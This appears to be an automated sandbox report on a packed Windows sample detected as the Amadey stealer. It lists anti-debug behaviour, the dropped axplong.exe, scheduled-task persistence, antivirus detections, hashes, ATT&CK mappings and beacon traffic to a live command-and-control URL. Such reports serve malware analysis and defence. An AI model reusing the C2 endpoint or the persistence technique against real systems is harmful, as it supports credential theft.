                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_050C01A1 rdtsc 1_2_050C01A1
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_0070645B mov eax, dword ptr fs:[00000030h]8_2_0070645B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_0070A1C2 mov eax, dword ptr fs:[00000030h]8_2_0070A1C2
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: axplong.exe, axplong.exe, 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: cProgram Manager
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_006ED312 cpuid 8_2_006ED312
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_006ECB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,8_2_006ECB1A

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Amadeys stealer DLL
                    Source: Yara matchFile source: 8.2.axplong.exe.6d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.axplong.exe.6d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.file.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.axplong.exe.6d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2272371089.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.2231966463.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.2221928235.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.2759333528.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2236057072.0000000000821000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2262405635.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.2195484295.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Command and Scripting Interpreter                    		1
                    Scheduled Task/Job                    		12
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		251
                    Virtualization/Sandbox Evasion                    		LSASS Memory741
                    Security Software Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		12
                    Process Injection                    		Security Account Manager2
                    Process Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Obfuscated Files or Information                    		NTDS251
                    Virtualization/Sandbox Evasion                    		Distributed Component Object ModelInput Capture11
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                    Software Packing                    		LSA Secrets1
                    Application Window Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    File and Directory Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync224
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    file.exe50%ReversingLabsWin32.Packed.Themida
                    file.exe100%AviraTR/Crypt.TPM.Gen
                    file.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe50%ReversingLabsWin32.Packed.Themida
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe53%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://185.215.113.16/Jo89Ku7d/index.phpe$100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpS.100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php5.185100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpk100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo100%Avira URL Cloudphishing
                    http://185.29.0%Avira URL Cloudsafe
                    http://185.215.113.16/Jo89Ku7d/index.php15.113.16100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php/Jo89Ku7d/index.php100%Avira URL Cloudmalware
                    http://185.215.113.16/Jo89Ku7d/index.php=.100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpu%100%Avira URL Cloudphishing
                    http://185.215.10%Avira URL Cloudsafe
                    http://185.215.113.16/Jo89Ku7d/index.phpS)y8100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR=100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpX100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php6100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phphp100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpE(100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpr100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpncoded100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpD)=::100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpo100%Avira URL Cloudphishing

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://185.215.113.16/Jo89Ku7d/index.phptrue
                    • Avira URL Cloud: phishing
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.16/Jo89Ku7d/index.phpe$axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpkaxplong.exe, 00000008.00000002.3426692930.00000000010EF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.php5.185axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpS.axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Joaxplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.29.axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.php/Jo89Ku7d/index.phpaxplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.php15.113.16axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.php=.axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpu%axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.1axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR=axplong.exe, 00000008.00000002.3426692930.00000000010EF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpS)y8axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpXaxplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.php6axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phphpaxplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpE(axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpraxplong.exe, 00000008.00000002.3426692930.00000000010CA000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpD)=::axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpncodedaxplong.exe, 00000008.00000002.3426692930.00000000010EF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpoaxplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    185.215.113.16
                    		unknownPortugal
                    		206894WHOLESALECONNECTIONSNLtrue

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1519970
                    Start date and time:2024-09-27 03:05:06 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 42s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:9
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@5/3@0/1
                    EGA Information:
                    • Successful, ratio: 25%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target axplong.exe, PID 4140 because there are no executed function
                    • Execution Graph export aborted for target axplong.exe, PID 6464 because there are no executed function
                    • Execution Graph export aborted for target file.exe, PID 4488 because it is empty
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    03:06:06Task SchedulerRun new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    21:07:01API Interceptor182841x Sleep call for process: axplong.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    185.215.113.16file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadey, DarkTortillaBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php

                    Domains

                    No context

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):1877504
                    Entropy (8bit):7.948285066531552
                    Encrypted:false
                    SSDEEP:49152:JfTSJzuwiqQdaKeQRJ7jLF7qtxaoRDPIQdbnAILUtCtxxwdL:wJFzQf1/oRDIQdDfk51
                    MD5:5E8202D139D4F31CF0637105BFB93FCC
                    SHA1:7A73D8AED5A165C4A4DB627C753AE092A6407DE2
                    SHA-256:8278C069E0FD88B41B19CF1D85FDC26CBF6947716F53A72491CB4792C20A3C56
                    SHA-512:0A5230E4D1B698DACE5B010AB9F58F7E669B447ECB109DBF7F56A1176138146D50CBE2D89F5D4FD8166B64545F6556E613F47CC1EF77726698F89CEAB96E6CCF
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 50%
                    • Antivirus: Virustotal, Detection: 53%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f.............................0J...........@..........................`J.....bG....@.................................W...k...........................(.J...............................J..................................................... . ............................@....rsrc...............................@....idata ............................@... ..).........................@...amswznhi......0.....................@...zlhbfepu..... J.....................@....taggant.0...0J.."..................@...........................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:[ZoneTransfer]....ZoneId=0

                    C:\Windows\Tasks\axplong.job

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):304
                    Entropy (8bit):3.405246776669828
                    Encrypted:false
                    SSDEEP:6:LbXlXUEZ+lX1lOJUPelkDdtE9+AQy0lb0lEt0:X1Q1lOmeeDs9+nVwlEt0
                    MD5:1A481074B932A17FE84A6E2F7818858E
                    SHA1:CAC19B522C9071B4D18F3A4270DF5D355DB6F0D3
                    SHA-256:D947ED01284290EC68A4F45358EB240412632B2AC8297DB34247994925A3BCF3
                    SHA-512:5A178F09B42F2CCF27B17FE4B010D8891DDDEEF33C04187A91B19437531E048FBC770D10A92D6973E055B8276D018D924115B00CB7691E567E6CB7E705268F77
                    Malicious:false
                    Reputation:low
                    Preview:.......z3..O.....uzrF.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.948285066531552
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:1'877'504 bytes
                    MD5:5e8202d139d4f31cf0637105bfb93fcc
                    SHA1:7a73d8aed5a165c4a4db627c753ae092a6407de2
                    SHA256:8278c069e0fd88b41b19cf1d85fdc26cbf6947716f53a72491cb4792c20a3c56
                    SHA512:0a5230e4d1b698dace5b010ab9f58f7e669b447ecb109dbf7f56a1176138146d50cbe2d89f5d4fd8166b64545f6556e613f47cc1ef77726698f89ceab96e6ccf
                    SSDEEP:49152:JfTSJzuwiqQdaKeQRJ7jLF7qtxaoRDPIQdbnAILUtCtxxwdL:wJFzQf1/oRDIQdDfk51
                    TLSH:D39533ABAF6C6588D1EEC031AC2762D6D23A20DE9FDE310B856C0532574E567FCB1C64
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

                    File Icon

                    Icon Hash:00928e8e8686b000

                    Static PE Info

                    General

                    Entrypoint:0x8a3000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                    Entrypoint Preview

                    Instruction
                    jmp 00007F1B7515B6DAh
                    je 00007F1B7515B6F2h
                    add byte ptr [eax], al
                    jmp 00007F1B7515D6D5h
                    add byte ptr [0B2595C2h], cl
                    add byte ptr [eax], al
                    add byte ptr [edi-07FFC2CDh], al

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x4a1a280x10amswznhi
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x4a19d80x18amswznhi
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    0x10000x680000x2de00bfc47b2ec95b0f01a098a6d3db89d648False0.9975359758174387data7.98822985623302IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x690000x1e00x200f53f2b91dec392e986468774843ffc62False0.57421875data4.450239173749085IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    0x6b0000x29e0000x200ab360c4d1537617559a9e061ce7fb50bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    amswznhi0x3090000x1990000x198c00ed66f6e897eaa8bd91ea386d4917c4a8False0.9942809871941896data7.951896268933144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    zlhbfepu0x4a20000x10000x4007633e08cf2b43f5653b62df35b517eb2False0.83203125data6.4671737786603245IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant0x4a30000x30000x220006685e5360226857c6ef845b684d4d8eFalse0.06640625DOS executable (COM)0.8775301686417039IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                    Resources

                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_MANIFEST0x4a1a380x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                    Imports

                    DLLImport
                    kernel32.dlllstrcpy

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States

                    Network Behavior

                    Suricata IDS Alerts

                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2024-09-27T03:07:07.692961+02002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.656628185.215.113.1680TCP

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Sep 27, 2024 03:07:02.601929903 CEST5662380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:02.606784105 CEST8056623185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:02.606889963 CEST5662380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:02.607655048 CEST5662380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:02.613023043 CEST8056623185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:03.316940069 CEST8056623185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:03.317004919 CEST5662380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:03.331706047 CEST5662380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:03.337024927 CEST8056623185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:03.554655075 CEST8056623185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:03.554780006 CEST5662380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:03.661922932 CEST5662380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:03.662250996 CEST5662480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:03.667095900 CEST8056624185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:03.667110920 CEST8056623185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:03.667231083 CEST5662380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:03.667269945 CEST5662480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:03.667393923 CEST5662480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:03.672346115 CEST8056624185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:04.358390093 CEST8056624185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:04.358521938 CEST5662480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:04.359389067 CEST5662480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:04.364167929 CEST8056624185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:04.581516981 CEST8056624185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:04.581691027 CEST5662480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:04.692949057 CEST5662580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:04.692950010 CEST5662480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:04.699570894 CEST8056625185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:04.699687958 CEST8056624185.215.113.16192.168.2.6
